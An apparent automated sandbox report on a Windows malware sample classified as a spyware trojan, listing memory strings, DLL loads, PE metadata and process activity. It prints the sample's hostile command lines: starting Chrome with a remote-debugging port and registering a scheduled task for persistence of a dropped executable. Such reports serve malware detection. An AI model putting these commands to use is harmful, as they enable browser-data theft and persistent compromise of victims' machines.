Source: chrome.exe, 00000003.00000003.2469219239.00001D8C02DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2503090550.00001D8C02DBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultP
Source: chrome.exe, 00000003.00000002.2500314783.00001D8C027C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501285330.00001D8C029DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2505579264.00001D8C0328C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2499758730.00001D8C02700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000003.00000002.2504327051.00001D8C02F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2499596207.00001D8C026B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501606029.00001D8C02A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2500757410.00001D8C028BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000003.00000002.2505479011.00001D8C03214000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501606029.00001D8C02A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2500757410.00001D8C028BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000003.00000002.2505479011.00001D8C03214000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501606029.00001D8C02A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2500757410.00001D8C028BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000003.00000003.2474575448.00001D8C03244000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502405215.00001D8C02C60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000003.00000002.2498273424.00001D8C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000003.00000002.2498350970.00001D8C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000003.00000002.2497582314.00001D8C02270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2505772639.00001D8C03364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2505738982.00001D8C03350000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000003.00000002.2501997310.00001D8C02B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2469954234.00001D8C028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504286664.00001D8C02F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504247409.00001D8C02F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000003.00000003.2469954234.00001D8C028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504247409.00001D8C02F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000003.2469954234.00001D8C028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504286664.00001D8C02F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504247409.00001D8C02F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000003.00000002.2504247409.00001D8C02F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000003.00000003.2469954234.00001D8C028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504286664.00001D8C02F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504247409.00001D8C02F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000003.00000002.2498757680.00001D8C024E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2469954234.00001D8C028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504247409.00001D8C02F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000003.00000002.2501997310.00001D8C02B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2469954234.00001D8C028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504286664.00001D8C02F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504247409.00001D8C02F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000003.2469954234.00001D8C028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504286664.00001D8C02F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2504247409.00001D8C02F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000003.00000002.2499632050.00001D8C026CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000003.00000003.2474575448.00001D8C03244000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502405215.00001D8C02C60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000003.00000003.2477613033.00001D8C0339C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2477512225.00001D8C025B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2477719434.00001D8C03418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000003.00000002.2502405215.00001D8C02C60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000003.00000002.2497647059.00001D8C0228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000003.00000002.2497705956.00001D8C022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000003.00000002.2498273424.00001D8C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000003.00000002.2504935776.00001D8C03094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501060454.00001D8C02934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2499632050.00001D8C026CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2504935776.00001D8C03094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501060454.00001D8C02934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2499632050.00001D8C026CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000003.00000002.2502112610.00001D8C02BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000003.00000002.2498273424.00001D8C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000003.00000002.2501678426.00001D8C02AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ww.google.com/
Source: chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000003.00000002.2503003628.00001D8C02D9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000003.00000002.2503003628.00001D8C02D9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000003.00000002.2503003628.00001D8C02D9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000003.00000002.2497647059.00001D8C0228C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000003.00000002.2503553897.00001D8C02E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2469764255.00001D8C02E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000003.00000002.2502112610.00001D8C02BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/CharBl3
Source: chrome.exe, 00000003.00000002.2505511869.00001D8C03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2503090550.00001D8C02DBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000003.00000002.2503090550.00001D8C02DBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2P
Source: chrome.exe, 00000003.00000002.2505099509.00001D8C030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2505772639.00001D8C03364000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 00000003.00000002.2500552713.00001D8C02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000003.00000002.2501572475.00001D8C02A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498273424.00001D8C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501678426.00001D8C02AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501060454.00001D8C02934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000003.00000002.2501572475.00001D8C02A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498273424.00001D8C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501678426.00001D8C02AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501060454.00001D8C02934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000003.00000002.2504605392.00001D8C0300C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000003.00000002.2500314783.00001D8C027C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502798973.00001D8C02D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2499758730.00001D8C02700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000003.00000003.2477719434.00001D8C03418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000003.00000002.2499632050.00001D8C026CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000003.00000002.2502372257.00001D8C02C50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000003.00000002.2497455779.00001D8C0222C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000003.00000002.2498350970.00001D8C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000003.00000002.2498350970.00001D8C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000003.00000002.2500314783.00001D8C027C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498350970.00001D8C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000003.00000002.2504436705.00001D8C02FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498350970.00001D8C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000003.00000002.2499632050.00001D8C026CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2503672976.00001D8C02EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Q
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2503509656.00001D8C02E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443

System Summary

barindex
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: 8kl5nJ3f9x.exe Static PE information: section name:
Source: 8kl5nJ3f9x.exe Static PE information: section name: .idata
Source: 8kl5nJ3f9x.exe Static PE information: section name:
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000751B0 13_2_000751B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_00073E20 13_2_00073E20
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 1832
Source: 8kl5nJ3f9x.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 8kl5nJ3f9x.exe Static PE information: Section: xxuhznbt ZLIB complexity 0.994595043344519
Source: 8kl5nJ3f9x.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/7@16/5
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7136
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000003.00000002.2501870295.00001D8C02B5A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: 8kl5nJ3f9x.exe ReversingLabs: Detection: 60%
Source: 8kl5nJ3f9x.exe Virustotal: Detection: 48%
Source: unknown Process created: C:\Users\user\Desktop\8kl5nJ3f9x.exe "C:\Users\user\Desktop\8kl5nJ3f9x.exe"
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2296,i,13278071847370876534,15083286086121155287,262144 /prefetch:8
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 1832
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2296,i,13278071847370876534,15083286086121155287,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: 8kl5nJ3f9x.exe Static file information: File size 4481024 > 1048576
Source: 8kl5nJ3f9x.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: 8kl5nJ3f9x.exe Static PE information: Raw size of xxuhznbt is bigger than: 0x100000 < 0x1bf000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000781E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,FreeLibrary, 13_2_000781E0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 8kl5nJ3f9x.exe Static PE information: real checksum: 0x4520a6 should be: 0x455a98
Source: 8kl5nJ3f9x.exe Static PE information: section name:
Source: 8kl5nJ3f9x.exe Static PE information: section name: .idata
Source: 8kl5nJ3f9x.exe Static PE information: section name:
Source: 8kl5nJ3f9x.exe Static PE information: section name: xxuhznbt
Source: 8kl5nJ3f9x.exe Static PE information: section name: ewnmsqqp
